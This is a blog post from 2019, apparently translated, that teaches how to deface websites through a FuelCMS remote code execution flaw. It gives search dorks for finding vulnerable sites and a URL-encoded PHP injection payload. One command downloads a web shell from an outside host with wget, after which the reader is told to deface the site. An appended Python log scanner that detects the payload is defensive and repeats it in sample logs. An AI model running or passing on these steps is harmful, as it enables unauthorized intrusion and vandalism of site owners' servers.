
Wednesday, 28 August 2019

Exploit FuelCMS Remote Code Execution

What's up, yo. It's been a long time since I wrote an article on this blog, not because I was busy but because I was lazy, lol. Since I've got nothing to do right now, fine, I'll scribble on the blog again, hehe.

Here I want to share a deface tutorial (again) using an exploit that's new, well, not that new, it's been around for a while, I'm just only now writing it up here, heh. What's it called? Check the title, bro.

Ref:
-Exploit-db
-Exploit kita

-First you need a shell/uploader. Put your shell/uploader on pastebin, or you can use mine: http://silverwings.mu/p/shell.txt
-Dork: intext:"FUEL CMS is developed with love by Daylight Studio"
intitle:"FUEL CMS"
inurl:/fuel/login
-Payload: fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27Command Here%27%29%2b%27

1: Dork first, bro, and grab some snacks while you're at it so you can chill a bit.
(I've already got my target)
2: Type view-source in front of the target URL, for example (view-source:target.com), then add the payload. Don't forget to put the command for uploading the shell/uploader into the payload. As an example, I use the command ls -la to bring up the directory listing (view-source:target.com/fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27ls -la%27%29%2b%27)
And there's the directory listing, hehe
3: Now just wget or curl your shell, guys, for example (view-source:target.com/fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27wget http://site.com/shell.txt -O upl.php%27%29%2b%27)
4: Once that's done, access the shell/uploader > target.com/shell.php
Success :D All that's left is to deface the site, hehe.
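
Seen from the server side, every step above leaves a request to /fuel/pages/select/ whose filter parameter carries quotes and PHP call syntax. The following log check is an added example, not part of the original post: the combined log format, the sample lines, the benign value filter=about and the names scan, fully_decode, SUSPICIOUS and CMD_RE are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format; IPs and timestamps are invented.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Aug/2019:10:01:02 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512',
    '198.51.100.9 - - [28/Aug/2019:10:02:10 +0000] "GET /fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27ls%20-la%27%29%2b%27 HTTP/1.1" 200 4096',
    # Same payload shape, percent-encoded twice to dodge naive string matching.
    '198.51.100.9 - - [28/Aug/2019:10:03:44 +0000] "GET /fuel/pages/select/?filter=%2527%252bpi%2528print%2528%2524a%253d%2527system%2527%2529%2529%252b%2524a%2528%2527id%2527%2529%252b%2527 HTTP/1.1" 200 300',
    '192.0.2.50 - - [28/Aug/2019:10:04:00 +0000] "GET /index.php?filter=%27x HTTP/1.1" 200 900',
]

REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate filter value is a plain word, so any character
# needed to break out of a PHP string and call a function is suspicious.
SUSPICIOUS = re.compile(r"""['"()$;`]""")
# Quoted string passed as a sole call argument, e.g. $a('ls -la') -> ls -la
CMD_RE = re.compile(r"\(\s*'([^']*)'\s*\)")


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding, bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines):
    """Return one record per suspicious request to /fuel/pages/select/."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.rstrip("/").lower().endswith("/fuel/pages/select"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("filter", []):
            value = fully_decode(raw)
            if SUSPICIOUS.search(value):
                hits.append({"client": line.split()[0], "filter": value,
                             "commands": CMD_RE.findall(value)})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["commands"], hit["filter"])
```

The commands field gives the responder the exact command each request tried to run, which tells them which files in the web root to look for.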

